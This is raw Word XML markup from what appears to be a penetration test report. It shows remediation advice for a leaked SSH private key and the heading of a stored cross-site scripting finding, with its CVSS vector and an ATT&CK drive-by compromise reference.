          <w:ilvl w:val="0"/>
          <w:numId w:val="4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428507">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The leaked private key</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="01CA86F4">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3428507">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="58673214">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disabl</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6B5AD8B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2A743C35">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and removed</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4342850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09F2C30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from all APT systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="388FFC1A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="528E956E" w:rsidP="0D325B6E" w:rsidRDefault="528E956E" w14:paraId="1A60DC9E" w14:textId="79B3C8A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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28E956E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Future SSH keys should be stored in a more secure </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51E90505">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>manner,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="528E956E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as inside internal private servers</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4E2D1BCA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are not accessible by low-privileged user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="21D90CB6" w14:textId="1AE81024">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643DB353" w:rsidP="0D325B6E" w:rsidRDefault="643DB353" w14:paraId="17E7899F" w14:textId="3756516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3DB353">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CC53F2E" w:rsidP="0D325B6E" w:rsidRDefault="5CC53F2E" w14:paraId="04DB238F" w14:textId="45BC099E">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rd5d7741e1a164ded">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="5CC53F2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>NIST - Recommendation for Key Management</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="19BFEE32" w:rsidP="0D325B6E" w:rsidRDefault="19BFEE32" w14:paraId="440F719D" w14:textId="457DF59C">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Raa0cf1d12fce44ce">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="19BFEE32">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t xml:space="preserve">SSH Academy - </w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4DA7A310">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>NIST 800-53 Controls for SSH Key Access and Storage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4DA7A310">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5AFD0B1B" w14:textId="3889D81D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="274939EB" w14:textId="4453A182">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="34BF792E" w14:textId="3A8D6C9B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BCE73F1" w:rsidP="0D325B6E" w:rsidRDefault="4BCE73F1" w14:paraId="557EFC5E" w14:textId="741D9EC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1640420382" w:id="1067255351"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4BCE73F1">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4BCE73F1">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc751454502" w:id="1563652983"/>
      <w:bookmarkStart w:name="_Toc42287065" w:id="1803053581"/>
      <w:bookmarkStart w:name="_Toc214600988" w:id="498939817"/>
      <w:bookmarkStart w:name="_Toc1020101700" w:id="1783707800"/>
      <w:bookmarkStart w:name="_Toc23697373" w:id="1078706472"/>
      <w:bookmarkStart w:name="_Toc1711838536" w:id="1554301243"/>
      <w:bookmarkStart w:name="_Toc706253149" w:id="1387692577"/>
      <w:bookmarkStart w:name="_Toc2050026064" w:id="222955573"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3C52F381">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Stored Cross Site Scripting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1554301243"/>
      <w:bookmarkEnd w:id="1387692577"/>
      <w:bookmarkEnd w:id="222955573"/>
      <w:bookmarkEnd w:id="1563652983"/>
      <w:bookmarkEnd w:id="1803053581"/>
      <w:bookmarkEnd w:id="498939817"/>
      <w:bookmarkEnd w:id="1783707800"/>
      <w:bookmarkEnd w:id="1078706472"/>
      <w:bookmarkEnd w:id="1067255351"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1C0AB667">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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093D804F">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E4DD17A" w14:textId="2485010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C7C31E" w14:textId="42BE5C2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5EFACB" w14:textId="5354623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0B612C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BBE797" w14:textId="28757DD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CE25678" w14:textId="394A0CFB">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B1D35F0" w14:textId="77A513C9">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D92A416" w14:textId="19D525AE">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4159320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521A38" w14:textId="146B1EA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53C140CB" w:rsidP="0D325B6E" w:rsidRDefault="53C140CB" w14:paraId="45B19AD2" w14:textId="3BE5ABB7">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53C140CB">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18CD197"/>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6697171"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="753BB23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81C5377" w14:textId="276C851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C0F5A9C" w:rsidP="0D325B6E" w:rsidRDefault="7C0F5A9C" w14:paraId="5B171E34" w14:textId="14E028D0">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N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R9377f9c6844642d1">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AC:L</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AT:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>PR:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/UI:P/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VC:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VI:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SC:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7C0F5A9C">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4CC2B300">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5BCDE9" w14:textId="65F17D8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7042A0E" w:rsidP="0D325B6E" w:rsidRDefault="07042A0E" w14:paraId="5B0A0EB3" w14:textId="0B613D3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7042A0E">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587E95E" w:rsidP="0D325B6E" w:rsidRDefault="3587E95E" w14:paraId="2A6D5A83" w14:textId="0F8278A9">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re291f4bbda4a476f">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3587E95E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1189</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="67F0A1B7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3587E95E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Drive-by Compromise</w:t>
